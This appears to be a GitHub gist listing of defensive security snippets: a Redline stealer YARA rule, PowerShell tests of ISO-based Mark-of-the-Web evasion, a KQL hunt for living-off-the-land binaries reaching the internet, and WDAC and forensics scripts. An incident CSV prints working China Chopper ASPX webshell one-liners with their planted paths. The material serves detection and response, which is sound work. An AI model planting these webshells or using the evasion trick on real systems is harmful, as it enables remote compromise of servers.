Skip to content

Instantly share code, notes, and snippets.

View danzek's full-sized avatar
🎵
Listening to meowzek

Dan danzek

🎵
Listening to meowzek
93 followers · 229 following
View GitHub Profile
@0xmachos
0xmachos / macOS-IR-Forensics.md
Last active February 28, 2024 13:11
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
@sucremad
sucremad / callcon.md
Last active November 19, 2021 12:28
Function Call Conventions

Most Common Calling Conventions

Most commons are cdecl, stdcall, fastcall

In function calls, parameters are pushed onto the stack from right to left.

Example Function Pseudo Code

int func(int x, int y, int z, int m, int k);
 
int a, b, c, d, e, ret;
@silence-is-best
silence-is-best / gist:911b660a9dca8268bc6effa44cef443e
Created June 9, 2021 21:56
Redline Stealer
rule redline_new_bin
{
meta:
description = "Redline stealer"
author = "James_inthe_box"
reference = "https://app.any.run/tasks/4921d1fe-1a14-4bf2-9d27-c443353362a8"
date = "2021/06"
maltype = "Stealer"
strings:
@mgraeber-rc
mgraeber-rc / SimulateInternetZoneTest.ps1
Created May 28, 2021 16:57
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism - it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non NTFS volumes
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
public static void Main(string[] Args) {
System.Console.WriteLine("Hello, world!");
System.Console.Read();
}
}
'@
@mgraeber-rc
mgraeber-rc / EventDiff.ps1
Created May 28, 2021 14:45
Display only new event log events - I refer to this as event log differential analysis
# Log the time prior to executing the action.
# This will be used as parth of an event log XPath filter.
$DateTimeBefore = [Xml.XmlConvert]::ToString((Get-Date).ToUniversalTime(), [System.Xml.XmlDateTimeSerializationMode]::Utc)
# Do the thing now that you want to see potential relevant events surface...
$null = Mount-DiskImage -ImagePath "$PWD\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly
# Allow a moment to allow events to populate
Start-Sleep -Seconds 5
@alexverboon
alexverboon / lolbinsnetworkpublic.kql
Created May 16, 2021 14:39
Hunt for lolbins connecting to public ip addresses
// Inspiration from https://github.com/jangeisbauer/AdvancedHunting/blob/master/hunt_for_lolbins just changed Processes to Networkevents
// T1218 Living of the land binaries connecting to the internet
// network activities with lolbins
DeviceNetworkEvents
| where RemoteIPType == 'Public'
| where InitiatingProcessFileName contains "Atbroker.exe" or
InitiatingProcessFileName contains "Bash.exe" or
InitiatingProcessFileName contains "Bitsadmin.exe" or
InitiatingProcessFileName contains "Certutil.exe" or
InitiatingProcessFileName contains "Cmdkey.exe" or
@mgraeber-rc
mgraeber-rc / powershell_structured_query.xml
Created March 16, 2021 17:33
Example custom event view I used to display only relevant PowerShell logs for a demo
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID='4688')]]
and
*[EventData[Data[@Name='NewProcessName']='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe']]
</Select>
<Select Path="Microsoft-Windows-PowerShell/Operational">
*[System[(EventID='4104')]]
and
@JohnHammond
JohnHammond / china_chopper_webshells.csv
Last active August 14, 2023 08:23
Microsoft Exchange Incident "China Chopper" ASPX Webshell filenames
# Occurrences Webshell Filename WebShell Syntax
46 C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
35 C:\inetpub\wwwroot\aspnet_client\discover.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
21 C:\inetpub\wwwroot\aspnet_client\shell.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script>
13 C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
8 C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script>
7 C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx http://f/<script language=
@mgraeber-rc
mgraeber-rc / Non_Microsoft_Driver_Load_Audit.xml
Created February 26, 2021 17:38
A WDAC audit-mode policy that will log all non-Windows-signed driver loads and any driver that is not WHQL or EV signed.
<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.0.0</VersionEx>
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule>
<Option>Enabled:Unsigned System Integrity Policy</Option>
</Rule>
<Rule>
@alexander-hanel
alexander-hanel / gogo.py
Last active March 19, 2022 18:15
GoLang Argument Parsing and Backtracing
DEBUG = True
def get_basic_block(ea):
"""get basic blocks of address"""
f = idaapi.get_func(ea)
fc = idaapi.FlowChart(f)
for block in fc:
if block.start_ea <= ea:
if block.end_ea > ea:
return block.start_ea, block.end_ea